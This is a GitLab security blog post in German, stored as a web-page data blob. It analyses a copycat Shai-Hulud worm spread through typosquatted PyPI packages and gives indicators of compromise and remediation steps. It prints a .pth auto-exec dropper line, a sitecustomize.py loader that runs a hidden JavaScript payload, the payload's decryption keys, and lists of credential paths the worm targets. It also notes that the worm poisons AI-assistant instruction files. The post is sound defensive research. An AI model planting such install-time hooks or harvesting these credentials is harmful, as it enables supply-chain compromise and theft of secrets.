[{"data":1,"prerenderedAt":1821},["ShallowReactive",2],{"/de-de/blog/shai-hulud-copycat-campaign-targets-python-developers":3,"navigation-de-de":1038,"banner-de-de":1458,"footer-de-de":1467,"blog-post-authors-de-de-Dinesh Bolkensteyn|Daniel Abeles":1706,"blog-related-posts-de-de-shai-hulud-copycat-campaign-targets-python-developers":1733,"blog-promotions-de-de":1758,"next-steps-de-de":1811},{"id":4,"title":5,"authors":6,"body":9,"category":1019,"date":1020,"description":1021,"extension":1022,"externalUrl":1023,"featured":1024,"heroImage":1025,"meta":1026,"navigation":1024,"path":1027,"seo":1028,"slug":1031,"stem":1032,"tags":1033,"template":1036,"updatedDate":1023,"__hash__":1037},"blogPosts/de-de/blog/shai-hulud-copycat-campaign-targets-python-developers.md","Shai-Hulud-Copycat-Kampagne zielt auf Python-Entwickler durch PyPI-Typosquatting",[7,8],"Dinesh Bolkensteyn","Daniel Abeles",{"type":10,"value":11,"toc":1004},"minimark",[12,23,26,31,39,74,83,86,95,99,104,122,184,191,213,283,289,293,296,333,336,339,393,397,400,493,497,500,531,535,548,555,571,575,790,794,797,822,826,938,942,955,964,972,976,985,988,1000],[13,14,15,16,22],"p",{},"Das Vulnerability Research-Team von GitLab hat einen koordinierten\nSupply-Chain-Angriff auf PyPI identifiziert, der eine Kopie der\n",[17,18,21],"a",{"href":19,"rel":20},"https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",[],"Shai-Hulud","-Malware\neinsetzt. Wir haben fünf schädliche Pakete gefunden: vier Typosquats, die Flask,\nRequests und NumPy imitieren, und ein weaponized legitimes Projekt. Die Pakete\nführen Code beim Installieren aus, ohne einen Import oder Funktionsaufruf zu\nerfordern, und tragen einen selbstverbreitenden Credential Stealer, der\nCI/CD-Umgebungen aller großen Cloud-Anbieter ins Visier nimmt.",[13,24,25],{},"Wir haben bestätigt, dass GitLab keines der betroffenen Pakete verwendet, und\nteilen unsere Erkenntnisse, um der breiteren Security-Community eine effektive\nReaktion zu ermöglichen.",[27,28,30],"h2",{"id":29},"angriffsverlauf","Angriffsverlauf",[13,32,33,34,38],{},"Unsere Monitoring-Systeme haben am 7. Juni 2026 fünf schädliche PyPI-Pakete\neines einzelnen Accounts (",[35,36,37],"code",{},"elitexp",") markiert. Vier sind Typosquats:",[40,41,42,58,66],"ul",{},[43,44,45,51,52,57],"li",{},[46,47,48],"strong",{},[35,49,50],{},"rlask"," und ",[46,53,54],{},[35,55,56],{},"tlask",", Typosquats von Flask",[43,59,60,65],{},[46,61,62],{},[35,63,64],{},"rsquests",", ein Typosquat von Requests",[43,67,68,73],{},[46,69,70],{},[35,71,72],{},"nhmpy",", ein Typosquat von NumPy",[13,75,76,77,82],{},"Das fünfte, ",[46,78,79],{},[35,80,81],{},"mflux-streamlit",", ist ein legitimes Projekt mit echten Nutzern,\ndas der Angreifer durch das Veröffentlichen bösartiger Versionen 0.0.3 und 0.0.4\nnach der Typosquat-Welle weaponized hat.",[13,84,85],{},"Der Angreifer veröffentlichte zunächst saubere „Probe\"-Versionen mit\nVersionsnummern, die exakt den aktuellen Real-Releases entsprachen (Flask 3.1.3,\nRequests 2.34.2 und NumPy 2.4.6). Sobald diese ohne Probleme indiziert waren,\nschob er neue Versionen mit eingebettetem Wurm-Payload nach.",[13,87,88,89,94],{},"Dies ist ein Copycat-Deployment. TeamPCP, die Gruppe hinter Shai-Hulud, hat den\nWurm-Code am 12. Mai 2026\n",[17,90,93],{"href":91,"rel":92},"https://ramimac.me/teampcp/",[],"als Open Source veröffentlicht",". Seitdem verfolgen\nwir unabhängige Akteure, die das Toolkit aufgreifen und auf neue Ziele richten.\nDiese Kampagne bringt denselben Wurm in das Python-Ökosystem.",[27,96,98],{"id":97},"technische-analyse","Technische Analyse",[100,101,103],"h3",{"id":102},"erster-infektionsvektor","Erster Infektionsvektor",[13,105,106,107,110,111,114,115,117,118,121],{},"Die ursprüngliche npm-Variante nutzte ein ",[35,108,109],{},"preinstall","-Skript. Diese Kampagne\nverfolgt einen anderen Ansatz und nutzt Pythons ",[35,112,113],{},".pth","-Datei-Mechanismus. Wheel-\nPakete können ",[35,116,113],{},"-Dateien mitliefern, die Python beim Start automatisch\nverarbeitet – ohne expliziten Import. Jedes schädliche Paket enthält eine Datei\nwie ",[35,119,120],{},"rlask-setup.pth"," mit einem einzeiligen Dropper:",[123,124,129],"pre",{"className":125,"code":126,"language":127,"meta":128,"style":128},"language-py shiki shiki-themes github-light","import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(),\".bun_ran\");\n_O.path.exists(_G)or exec('import os as _o,subprocess as _s,urllib.request as _u...')\n","py","",[35,130,131,162],{"__ignoreMap":128},[132,133,136,140,144,147,150,152,155,159],"span",{"class":134,"line":135},"line",1,[132,137,139],{"class":138},"sD7c4","import",[132,141,143],{"class":142},"sgsFI"," os ",[132,145,146],{"class":138},"as",[132,148,149],{"class":142}," _O,tempfile ",[132,151,146],{"class":138},[132,153,154],{"class":142}," _T;_G=_O.path.join(_T.gettempdir(),",[132,156,158],{"class":157},"sYBdl","\".bun_ran\"",[132,160,161],{"class":142},");\n",[132,163,165,168,171,175,178,181],{"class":134,"line":164},2,[132,166,167],{"class":142},"_O.path.exists(_G)",[132,169,170],{"class":138},"or",[132,172,174],{"class":173},"sYu0t"," exec",[132,176,177],{"class":142},"(",[132,179,180],{"class":157},"'import os as _o,subprocess as _s,urllib.request as _u...'",[132,182,183],{"class":142},")\n",[13,185,186,187,190],{},"Der Dropper prüft auf eine Marker-Datei (",[35,188,189],{},".bun_ran"," im System-Temp-Verzeichnis),\num eine erneute Ausführung zu vermeiden, lädt dann die Bun-JavaScript-Runtime\nvon GitHub herunter und führt damit einen 5 MB großen verschleierten\nJavaScript-Payload aus, der im Paket gebündelt ist.",[13,192,193,194,196,197,200,201,204,205,208,209,212],{},"Frühe Versionen von ",[35,195,50],{}," enthielten außerdem eine ",[35,198,199],{},"sitecustomize.py","-Datei\nals Backup-Ausführungspfad. Python importiert ",[35,202,203],{},"sitecustomize"," beim Start\nautomatisch, und diese Datei durchsuchte ",[35,206,207],{},"sys.path"," nach dem versteckten\n",[35,210,211],{},"_index.js","-Payload:",[123,214,216],{"className":125,"code":215,"language":127,"meta":128,"style":128},"import subprocess, os, sys\nfor d in sys.path:\n  js = os.path.join(d, \"_index.js\")\n  if os.path.exists(js):\n    subprocess.run([\"node\", js])\n    break\n",[35,217,218,225,239,256,265,277],{"__ignoreMap":128},[132,219,220,222],{"class":134,"line":135},[132,221,139],{"class":138},[132,223,224],{"class":142}," subprocess, os, sys\n",[132,226,227,230,233,236],{"class":134,"line":164},[132,228,229],{"class":138},"for",[132,231,232],{"class":142}," d ",[132,234,235],{"class":138},"in",[132,237,238],{"class":142}," sys.path:\n",[132,240,242,245,248,251,254],{"class":134,"line":241},3,[132,243,244],{"class":142},"  js ",[132,246,247],{"class":138},"=",[132,249,250],{"class":142}," os.path.join(d, ",[132,252,253],{"class":157},"\"_index.js\"",[132,255,183],{"class":142},[132,257,259,262],{"class":134,"line":258},4,[132,260,261],{"class":138},"  if",[132,263,264],{"class":142}," os.path.exists(js):\n",[132,266,268,271,274],{"class":134,"line":267},5,[132,269,270],{"class":142},"    subprocess.run([",[132,272,273],{"class":157},"\"node\"",[132,275,276],{"class":142},", js])\n",[132,278,280],{"class":134,"line":279},6,[132,281,282],{"class":138},"    break\n",[13,284,285,286,288],{},"Der Angreifer hat diesen Backup-Mechanismus in späteren Versionen entfernt und\nden ",[35,287,113],{},"-Ansatz offenbar für ausreichend befunden.",[100,290,292],{"id":291},"payload-verschleierung","Payload-Verschleierung",[13,294,295],{},"Der JavaScript-Payload ist in drei Schichten gewickelt:",[297,298,299,316,322],"ol",{},[43,300,301,302,305,306,309,310,312,313,315],{},"Eine ",[46,303,304],{},"ROT-N-Zeichenchiffre",", angewendet auf ein Integer-Array (der\nRotationswert variiert je Paket: ROT-13 für ",[35,307,308],{},"rlask@3.1.4",", ROT-17 für\n",[35,311,64],{},", ROT-25 für ",[35,314,56],{},")",[43,317,318,321],{},[46,319,320],{},"AES-128-GCM-Verschlüsselung"," mit hardcodierten Keys, die zwei\nverschlüsselte Blobs erzeugt",[43,323,324,325,328,329,332],{},"Standard ",[46,326,327],{},"Variable-Name-Mangling"," (",[35,330,331],{},"_0x","-Präfix-Obfuskierung) auf dem\ninneren Payload",[13,334,335],{},"Wir haben den Payload durch statische Analyse entschlüsselt, ohne Code\nauszuführen. Der erste Blob (907 Bytes) ist der Bun-Runtime-Downloader. Der\nzweite Blob (772 KB) ist der vollständige Shai-Hulud-Credential-Stealer mit\n2.538 hardcodierten Strings.",[13,337,338],{},"Für Forscher, die eine eigene Analyse durchführen, hier die AES-Entschlüsselungskeys:",[340,341,342,359],"table",{},[343,344,345],"thead",{},[346,347,348,353,356],"tr",{},[349,350,352],"th",{"align":351},"left","Layer",[349,354,355],{"align":351},"Key",[349,357,358],{"align":351},"IV",[360,361,362,378],"tbody",{},[346,363,364,368,373],{},[365,366,367],"td",{"align":351},"Bun downloader",[365,369,370],{"align":351},[35,371,372],{},"c95506221d18936328fbc7ddcd21e3dd",[365,374,375],{"align":351},[35,376,377],{},"48da5faeafac0ac88a410bb0",[346,379,380,383,388],{},[365,381,382],{"align":351},"Worm payload",[365,384,385],{"align":351},[35,386,387],{},"7557c4e782a0622159476d1ea10d5236",[365,389,390],{"align":351},[35,391,392],{},"55a7d25e0e61b77cc175bcc3",[100,394,396],{"id":395},"credential-harvesting","Credential Harvesting",[13,398,399],{},"Einmal aktiv, greift der Wurm Credentials auf allen großen Cloud- und\nCI/CD-Plattformen ab:",[40,401,402,412,422,428,434,451,457,463,469,475,481,487],{},[43,403,404,407,408,411],{},[46,405,406],{},"GitHub Actions",": ",[35,409,410],{},"GITHUB_TOKEN",", Personal Access Tokens, Fine-Grained\nTokens, OIDC-Tokens, Organisations- und Repository-Secrets, Actions-Artifacts\nund Runner-Prozessspeicher",[43,413,414,417,418,421],{},[46,415,416],{},"AWS",": IAM-Access-Keys, Secret Keys, Session-Tokens, IMDS-Instanz-Credentials\n(",[35,419,420],{},"169[.]254[.]169[.]254","), Secrets-Manager-Einträge, SSM-Parameter,\nSTS-Federation-Tokens",[43,423,424,427],{},[46,425,426],{},"Azure",": Client Secrets, Managed Identity Tokens, Key Vault Secrets,\nFederated Credentials, Microsoft Graph API Tokens",[43,429,430,433],{},[46,431,432],{},"GCP",": Service-Account-Keys, Application Default Credentials,\nCloud-Platform-Scope-Tokens",[43,435,436,439,440,443,444,443,447,450],{},[46,437,438],{},"HashiCorp Vault",": Vault-Tokens aus sieben bekannten Dateisystempfaden\n(",[35,441,442],{},"/var/run/secrets/vault-token",", ",[35,445,446],{},"/etc/vault/token",[35,448,449],{},"/root/.vault-token","\nund weitere), plus API-Zugriff und Kubernetes Vault Auth",[43,452,453,456],{},[46,454,455],{},"npm / JFrog",": npm-Tokens, JFrog/Artifactory-API-Keys, OIDC-Token-Exchange",[43,458,459,462],{},[46,460,461],{},"PyPI",": Publishing-Tokens, OIDC-Mint-Tokens",[43,464,465,468],{},[46,466,467],{},"RubyGems",": API-Keys, Gem-Publishing-Credentials",[43,470,471,474],{},[46,472,473],{},"SSH",": Private Keys für Lateral Movement",[43,476,477,480],{},[46,478,479],{},"Kubernetes",": Service-Account-Tokens, Kubeconfig-Dateien",[43,482,483,486],{},[46,484,485],{},"Sigstore",": OIDC-Tokens und Fulcio-Signing-Zertifikate, die dem Angreifer\nermöglichen würden, Artefakte unter einer vertrauenswürdigen Identität zu\nsignieren",[43,488,489,492],{},[46,490,491],{},"Datenbanken",": MongoDB-, MySQL-, PostgreSQL- und Redis-Connection-Strings\nmit eingebetteten Passwörtern",[100,494,496],{"id":495},"selbstverbreitung","Selbstverbreitung",[13,498,499],{},"Wie die ursprüngliche npm-Variante ist dies nicht nur ein Stealer. Er\nverbreitet sich. Mit gestohlenen Credentials führt der Wurm Folgendes aus:",[40,501,502,509,516,519,522],{},[43,503,504,505,508],{},"Committet ",[35,506,507],{},".github/setup.js"," und Workflow-Dateien in zugängliche\nGitHub-Repositories und bewirkt damit, dass der Wurm in anderen CI-Pipelines\nerneut ausgeführt wird",[43,510,511,512,515],{},"Injiziert ",[35,513,514],{},".github/copilot-instructions.md",", um KI-Code-Assistenten zu\nvergiften",[43,517,518],{},"Veröffentlicht zusätzliche vergiftete Pakete auf PyPI, npm und RubyGems mit\ngestohlenen Registry-Tokens",[43,520,521],{},"Versucht Privilege Escalation auf selbst gehosteten CI-Runnern durch\nInjektion von Sudoers-Regeln",[43,523,524,525,530],{},"Prüft auf ",[17,526,529],{"href":527,"rel":528},"https://github.com/step-security/harden-runner",[],"StepSecuritys harden-runner","\nund passt das Verhalten bei Erkennung an",[100,532,534],{"id":533},"der-angreifer","Der Angreifer",[13,536,537,538,540,541,543,544,547],{},"Alle fünf Pakete gehören dem PyPI-Account ",[35,539,37],{},". Der Account wurde im\nNovember 2024 mit einem legitimen Paket erstellt (",[35,542,81],{},", eine\nStreamlit-UI für Bildgenerierung mit 11 Stars auf GitHub). Der zugehörige\nGitHub-Account (",[35,545,546],{},"github[.]com/elitexp",") ist über 13 Jahre alt und hat 43\nöffentliche Repositories, darunter Uni-Coursework und Laravel-Projekte.",[13,549,550,551,554],{},"Upload-Metadaten zeigen, dass alle Pakete mit ",[35,552,553],{},"Bun/1.3.14"," als User-Agent\nveröffentlicht wurden – derselben Runtime, die die Malware als Teil ihrer\nAusführungskette herunterlädt.",[13,556,557,558,560,561,564,565,567,568,570],{},"Der Angreifer hat auch ",[35,559,81],{}," selbst weaponized. Versionen 0.0.1\nund 0.0.2 sind sauber, aber ",[46,562,563],{},"Versionen 0.0.3 und 0.0.4",", veröffentlicht um\n15:23 und 15:37 UTC nach der Typosquat-Kampagne, enthalten denselben\n",[35,566,113],{},"-Dropper und obfuskierten Payload. Das macht den Angriff gefährlicher\nals ein typischer Typosquat: ",[35,569,81],{}," ist ein echtes Projekt mit\nbestehenden Nutzern, die das vergiftete Update durch normale\nAbhängigkeitsauflösung erhalten könnten.",[27,572,574],{"id":573},"indicators-of-compromise","Indicators of Compromise",[340,576,577,590],{},[343,578,579],{},[346,580,581,584,587],{},[349,582,583],{"align":351},"Type",[349,585,586],{"align":351},"Indicator",[349,588,589],{"align":351},"Description",[360,591,592,605,616,628,640,652,668,682,694,705,718,730,742,754,766,779],{},[346,593,594,597,602],{},[365,595,596],{"align":351},"package",[365,598,599,601],{"align":351},[35,600,50],{}," 3.1.4-3.1.7",[365,603,604],{"align":351},"Malicious Flask typosquat",[346,606,607,609,614],{},[365,608,596],{"align":351},[365,610,611,613],{"align":351},[35,612,56],{}," 3.1.4",[365,615,604],{"align":351},[346,617,618,620,625],{},[365,619,596],{"align":351},[365,621,622,624],{"align":351},[35,623,64],{}," 2.34.3",[365,626,627],{"align":351},"Malicious Requests typosquat",[346,629,630,632,637],{},[365,631,596],{"align":351},[365,633,634,636],{"align":351},[35,635,72],{}," 2.4.7",[365,638,639],{"align":351},"Malicious NumPy typosquat",[346,641,642,644,649],{},[365,643,596],{"align":351},[365,645,646,648],{"align":351},[35,647,81],{}," 0.0.3, 0.0.4",[365,650,651],{"align":351},"Weaponized legitimate package",[346,653,654,657,662],{},[365,655,656],{"align":351},"file",[365,658,659],{"align":351},[35,660,661],{},"{package}-setup.pth",[365,663,664,665,315],{"align":351},"Auto-executing dropper (SHA256: ",[35,666,667],{},"6506d317...",[346,669,670,672,676],{},[365,671,656],{"align":351},[365,673,674],{"align":351},[35,675,199],{},[365,677,678,679,681],{"align":351},"Backup auto-execution (present in ",[35,680,50],{}," only)",[346,683,684,686,691],{},[365,685,656],{"align":351},[365,687,688],{"align":351},[35,689,690],{},"{package}/_index.js",[365,692,693],{"align":351},"Obfuscated worm payload (5.2MB)",[346,695,696,698,702],{},[365,697,656],{"align":351},[365,699,700],{"align":351},[35,701,189],{},[365,703,704],{"align":351},"Execution marker in system temp directory",[346,706,707,710,715],{},[365,708,709],{"align":351},"network",[365,711,712],{"align":351},[35,713,714],{},"hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip",[365,716,717],{"align":351},"Bun runtime download",[346,719,720,722,727],{},[365,721,709],{"align":351},[365,723,724],{"align":351},[35,725,726],{},"hxxps[://]upload[.]pypi[.]org/legacy/",[365,728,729],{"align":351},"Worm publishes poisoned PyPI packages",[346,731,732,734,739],{},[365,733,709],{"align":351},[365,735,736],{"align":351},[35,737,738],{},"hxxp[://]169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/",[365,740,741],{"align":351},"AWS IMDS credential theft",[346,743,744,746,751],{},[365,745,709],{"align":351},[365,747,748],{"align":351},[35,749,750],{},"hxxps[://]login[.]microsoftonline[.]com/",[365,752,753],{"align":351},"Azure AD token acquisition",[346,755,756,758,763],{},[365,757,709],{"align":351},[365,759,760],{"align":351},[35,761,762],{},"hxxps[://]fulcio[.]sigstore[.]dev",[365,764,765],{"align":351},"Sigstore certificate request",[346,767,768,771,776],{},[365,769,770],{"align":351},"actor",[365,772,773,775],{"align":351},[35,774,37],{}," (PyPI)",[365,777,778],{"align":351},"Package owner",[346,780,781,783,787],{},[365,782,770],{"align":351},[365,784,785],{"align":351},[35,786,553],{},[365,788,789],{"align":351},"Upload user-agent",[27,791,793],{"id":792},"maßnahmen-im-kompromittierungsfall","Maßnahmen im Kompromittierungsfall",[13,795,796],{},"Falls eines dieser Pakete in der eigenen Umgebung installiert war:",[297,798,799,805,808,816,819],{},[43,800,801,802,804],{},"Das Paket sofort entfernen und im System-Temp-Verzeichnis nach der\nMarker-Datei ",[35,803,189],{}," suchen.",[43,806,807],{},"Alle Credentials rotieren, die in der Umgebung zugänglich waren, in der das\nPaket installiert wurde. Dazu gehören CI/CD-Tokens, Cloud-Provider-Credentials,\nSSH-Keys und Registry-Publishing-Tokens.",[43,809,810,811,443,813,815],{},"GitHub-Repositories auf unerwartete Commits prüfen, insbesondere auf Dateien\nwie ",[35,812,507],{},[35,814,514],{}," oder geänderte\nWorkflow-Dateien.",[43,817,818],{},"Package-Registry-Accounts (PyPI, npm, RubyGems) auf nicht selbst\nveröffentlichte Pakete prüfen.",[43,820,821],{},"CI/CD-Pipeline-Logs auf unerwartete Bun-Downloads oder\nJavaScript-Ausführungen überprüfen.",[27,823,825],{"id":824},"timeline","Timeline",[340,827,828,838],{},[343,829,830],{},[346,831,832,835],{},[349,833,834],{"align":351},"Date",[349,836,837],{"align":351},"Event",[360,839,840,848,862,873,881,889,900,908,916,930],{},[346,841,842,845],{},[365,843,844],{"align":351},"2026-05-12",[365,846,847],{"align":351},"TeamPCP veröffentlicht den Shai-Hulud-Wurm als Open Source",[346,849,850,853],{},[365,851,852],{"align":351},"2026-06-07 13:47 UTC",[365,854,855,856,443,859,315],{"align":351},"Probe-Versionen veröffentlicht (",[35,857,858],{},"rlask@3.1.3",[35,860,861],{},"rsquests@2.34.2",[346,863,864,867],{},[365,865,866],{"align":351},"2026-06-07 14:20 UTC",[365,868,869,870,872],{"align":351},"Erste bösartige Version (",[35,871,308],{},"), innerhalb von 28 Sekunden erkannt",[346,874,875,878],{},[365,876,877],{"align":351},"2026-06-07 14:24 UTC",[365,879,880],{"align":351},"Automatische Analyse abgeschlossen, als bösartig/kritisch markiert",[346,882,883,886],{},[365,884,885],{"align":351},"2026-06-07 14:27-15:04 UTC",[365,887,888],{"align":351},"Sechs weitere bösartige Versionen über alle vier Paketnamen veröffentlicht",[346,890,891,894],{},[365,892,893],{"align":351},"2026-06-07 15:23-15:37 UTC",[365,895,896,897,899],{"align":351},"Angreifer weaponized eigenes legitimes ",[35,898,81],{},"-Paket (v0.0.3, v0.0.4)",[346,901,902,905],{},[365,903,904],{"align":351},"2026-06-07",[365,906,907],{"align":351},"Untersuchung bestätigt vollständigen Shai-Hulud-Wurm durch statische Analyse",[346,909,910,913],{},[365,911,912],{"align":351},"2026-06-07 16:01 UTC",[365,914,915],{"align":351},"Alle bösartigen Pakete dem PyPI-Security-Team gemeldet",[346,917,918,921],{},[365,919,920],{"align":351},"2026-06-08 03:15:06 UTC",[365,922,923,924,929],{"align":351},"Advisory zur ",[17,925,928],{"href":926,"rel":927},"https://advisories.gitlab.com/",[],"GitLab Advisory Database"," hinzugefügt",[346,931,932,935],{},[365,933,934],{"align":351},"2026-06-08",[365,936,937],{"align":351},"PyPI entfernt alle Releases der bösartigen Pakete",[27,939,941],{"id":940},"gitlab-als-erkennungshilfe","GitLab als Erkennungshilfe",[13,943,944,945,950,951,954],{},"Wer GitLab Ultimate einsetzt, kann mit\n",[17,946,949],{"href":947,"rel":948},"https://docs.gitlab.com/ee/user/application_security/dependency_scanning/",[],"Dependency Scanning","\nautomatisch die Exposition gegenüber diesen Paketen in Projekten aufdecken. Wir\nhaben Advisories (GMS-2026-572 bis GMS-2026-576) für alle fünf Pakete in der\n",[17,952,928],{"href":926,"rel":953},[]," eingereicht. Nach dem\nMerge wird jedes Projekt mit aktiviertem Dependency Scanning diese Pakete in\nPipeline-Ergebnissen und dem Vulnerability Report markieren.",[13,956,957,958,963],{},"Für Teams, die viele Repositories verwalten, kann\n",[17,959,962],{"href":960,"rel":961},"https://docs.gitlab.com/ee/user/gitlab_duo_chat/",[],"GitLab Duo Chat"," mit dem\nSecurity Analyst Agent die schnelle Triage unterstützen. Mögliche Fragen:",[40,965,966,969],{},[43,967,968],{},"\"Are any of my dependencies affected by the Shai-Hulud PyPI campaign?\"",[43,970,971],{},"\"Does this project have any malicious Python dependencies?\"",[27,973,975],{"id":974},"ausblick","Ausblick",[13,977,978,979,981,982,984],{},"Diese Kampagne haben wir nach der Open-Source-Veröffentlichung des\nShai-Hulud-Wurms durch TeamPCP im Mai erwartet. Unabhängige Akteure greifen das\nToolkit auf und setzen es gegen neue Ökosysteme ein. Die Python-Variante\nverwendet einen anderen ersten Infektionsvektor (",[35,980,113],{},"-Dateien statt\n",[35,983,109],{},"-Skripte), trägt aber denselben Credential-Harvesting- und\nSelbstverbreitungs-Code darunter.",[13,986,987],{},"Unsere Monitoring-Systeme verfolgen weiterhin Copycat-Deployments über npm,\nPyPI und andere Registries. Wir werden diesen Beitrag aktualisieren, sobald\nweitere Informationen vorliegen.",[989,990,991],"blockquote",{},[13,992,993,994,999],{},"Weitere Artikel des Vulnerability Research-Teams auf der\n",[17,995,998],{"href":996,"rel":997},"https://about.gitlab.com/de-de/blog/categories/security-labs/",[],"Security Labs-Website",".",[1001,1002,1003],"style",{},"html pre.shiki code .sD7c4, html code.shiki .sD7c4{--shiki-default:#D73A49}html pre.shiki code .sgsFI, html code.shiki .sgsFI{--shiki-default:#24292E}html pre.shiki code .sYBdl, html code.shiki .sYBdl{--shiki-default:#032F62}html pre.shiki code .sYu0t, html code.shiki .sYu0t{--shiki-default:#005CC5}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":128,"searchDepth":164,"depth":164,"links":1005},[1006,1007,1014,1015,1016,1017,1018],{"id":29,"depth":164,"text":30},{"id":97,"depth":164,"text":98,"children":1008},[1009,1010,1011,1012,1013],{"id":102,"depth":241,"text":103},{"id":291,"depth":241,"text":292},{"id":395,"depth":241,"text":396},{"id":495,"depth":241,"text":496},{"id":533,"depth":241,"text":534},{"id":573,"depth":164,"text":574},{"id":792,"depth":164,"text":793},{"id":824,"depth":164,"text":825},{"id":940,"depth":164,"text":941},{"id":974,"depth":164,"text":975},"security-labs","2026-06-09","GitLabs Vulnerability Research-Team hat einen Python-Supply-Chain-Angriff auf PyPI entdeckt: Der Shai-Hulud-Wurm stiehlt Credentials aus CI/CD-Systemen.","md",null,true,"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png",{},"/de-de/blog/shai-hulud-copycat-campaign-targets-python-developers",{"config":1029,"title":5,"description":1021},{"noIndex":1030},false,"shai-hulud-copycat-campaign-targets-python-developers","de-de/blog/shai-hulud-copycat-campaign-targets-python-developers",[1034,1035],"security","security releases","BlogPost","yWoCpCMr1YDYir8j2M223JSr2jLBtHu1pznn5ebF7xE",{"logo":1039,"freeTrial":1044,"sales":1049,"login":1054,"items":1059,"search":1376,"minimal":1410,"duo":1428,"switchNav":1437,"pricingDeployment":1448},{"config":1040},{"href":1041,"dataGaName":1042,"dataGaLocation":1043},"/de-de/","gitlab logo","header",{"text":1045,"config":1046},"Kostenlose Testversion anfordern",{"href":1047,"dataGaName":1048,"dataGaLocation":1043},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/de-de&glm_content=default-saas-trial/","free trial",{"text":1050,"config":1051},"Vertrieb kontaktieren",{"href":1052,"dataGaName":1053,"dataGaLocation":1043},"/de-de/sales/","sales",{"text":1055,"config":1056},"Anmelden",{"href":1057,"dataGaName":1058,"dataGaLocation":1043},"https://gitlab.com/users/sign_in/","sign in",[1060,1089,1191,1196,1300,1356],{"text":1061,"config":1062,"menu":1064},"Plattform",{"dataNavLevelOne":1063},"platform",{"type":1065,"columns":1066},"cards",[1067,1073,1081],{"title":1061,"description":1068,"link":1069},"Die intelligente Orchestrierungsplattform für DevSecOps",{"text":1070,"config":1071},"Die Plattform erkunden",{"href":1072,"dataGaName":1063,"dataGaLocation":1043},"/de-de/platform/",{"title":1074,"description":1075,"link":1076},"GitLab Duo Agent Platform","Agentische KI für den gesamten Software-Lebenszyklus",{"text":1077,"config":1078},"Lerne GitLab Duo kennen",{"href":1079,"dataGaName":1080,"dataGaLocation":1043},"/de-de/gitlab-duo-agent-platform/","gitlab duo agent platform",{"title":1082,"description":1083,"link":1084},"Warum GitLab?","Erfahre, warum sich Unternehmen für GitLab entscheiden",{"text":1085,"config":1086},"Mehr erfahren",{"href":1087,"dataGaName":1088,"dataGaLocation":1043},"/de-de/why-gitlab/","why gitlab",{"text":1090,"left":1024,"config":1091,"menu":1093},"Produkt",{"dataNavLevelOne":1092},"solutions",{"type":1094,"link":1095,"columns":1099,"feature":1170},"lists",{"text":1096,"config":1097},"Alle Lösungen anzeigen",{"href":1098,"dataGaName":1092,"dataGaLocation":1043},"/de-de/solutions/",[1100,1125,1148],{"title":1101,"description":1102,"link":1103,"items":1108},"Automatisierung","CI/CD und Automatisierung zur Beschleunigung der Bereitstellung",{"config":1104},{"icon":1105,"href":1106,"dataGaName":1107,"dataGaLocation":1043},"AutomatedCodeAlt","/de-de/solutions/delivery-automation/","automated software delivery",[1109,1113,1116,1121],{"text":1110,"config":1111},"CI/CD",{"href":1112,"dataGaLocation":1043,"dataGaName":1110},"/de-de/solutions/continuous-integration/",{"text":1074,"config":1114},{"href":1079,"dataGaLocation":1043,"dataGaName":1115},"gitlab duo agent platform - product menu",{"text":1117,"config":1118},"Quellcodeverwaltung",{"href":1119,"dataGaLocation":1043,"dataGaName":1120},"/de-de/solutions/source-code-management/","Source Code Management",{"text":1122,"config":1123},"Automatische Softwarebereitstellung",{"href":1106,"dataGaLocation":1043,"dataGaName":1124},"Automated software delivery",{"title":1126,"description":1127,"link":1128,"items":1133},"Sicherheit","Entwickle Code schneller ohne Abstriche bei der Sicherheit",{"config":1129},{"href":1130,"dataGaName":1131,"dataGaLocation":1043,"icon":1132},"/de-de/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[1134,1138,1143],{"text":1135,"config":1136},"Anwendungssicherheitstests",{"href":1130,"dataGaName":1137,"dataGaLocation":1043},"Application security testing",{"text":1139,"config":1140},"Sicherheit der Software-Lieferkette",{"href":1141,"dataGaLocation":1043,"dataGaName":1142},"/de-de/solutions/supply-chain/","Software supply chain security",{"text":1144,"config":1145},"Software-Compliance",{"href":1146,"dataGaName":1147,"dataGaLocation":1043},"/de-de/solutions/software-compliance/","software compliance",{"title":1149,"link":1150,"items":1155},"Messung",{"config":1151},{"icon":1152,"href":1153,"dataGaName":1154,"dataGaLocation":1043},"DigitalTransformation","/de-de/solutions/visibility-measurement/","visibility and measurement",[1156,1160,1165],{"text":1157,"config":1158},"Sichtbarkeit und Messung",{"href":1153,"dataGaLocation":1043,"dataGaName":1159},"Visibility and Measurement",{"text":1161,"config":1162},"Wertstrommanagement",{"href":1163,"dataGaLocation":1043,"dataGaName":1164},"/de-de/solutions/value-stream-management/","Value Stream Management",{"text":1166,"config":1167},"Analysen und Einblicke",{"href":1168,"dataGaLocation":1043,"dataGaName":1169},"/de-de/solutions/analytics-and-insights/","Analytics and insights",{"title":1171,"type":1094,"items":1172},"GitLab für",[1173,1179,1185],{"text":1174,"config":1175},"Enterprise",{"icon":1176,"href":1177,"dataGaLocation":1043,"dataGaName":1178},"Building","/de-de/enterprise/","enterprise",{"text":1180,"config":1181},"Kleinunternehmen",{"icon":1182,"href":1183,"dataGaLocation":1043,"dataGaName":1184},"Work","/de-de/small-business/","small business",{"text":1186,"config":1187},"Öffentlicher Sektor",{"icon":1188,"href":1189,"dataGaLocation":1043,"dataGaName":1190},"Organization","/de-de/solutions/public-sector/","public sector",{"text":1192,"config":1193},"Preise",{"href":1194,"dataGaName":1195,"dataGaLocation":1043,"dataNavLevelOne":1195},"/de-de/pricing/","pricing",{"text":1197,"config":1198,"menu":1200},"Ressourcen",{"dataNavLevelOne":1199},"resources",{"type":1094,"link":1201,"columns":1205,"feature":1289},{"text":1202,"config":1203},"Alle Ressourcen 